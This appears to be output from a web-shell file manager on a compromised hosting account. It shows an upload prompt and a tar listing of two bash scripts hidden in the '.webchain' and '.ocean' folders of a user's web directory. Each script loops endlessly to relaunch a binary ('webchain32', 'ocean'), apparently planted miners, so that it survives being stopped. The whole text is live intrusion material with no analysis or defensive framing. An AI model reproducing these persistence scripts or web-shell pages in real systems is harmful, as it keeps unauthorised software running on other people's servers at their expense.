Your IP : 216.73.216.245


Current Path : /home/b/o/u/bourgleram/www/398a1/
Upload File :
Current File : /home/b/o/u/bourgleram/www/398a1/start.sh.tar

home/bourgleram/www/.webchain/start.sh000075500000000170152522206030014004 0ustar00#!/bin/bash

while true; do
    if ! pgrep webchain32 > /dev/null; then
        ./webchain32
    fi
    sleep 20 
done

home/bourgleram/www/.ocean/start.sh000075500000000156152525654060013332 0ustar00#!/bin/bash

while true; do
    if ! pgrep ocean > /dev/null; then
        ./ocean
    fi
    sleep 20 
done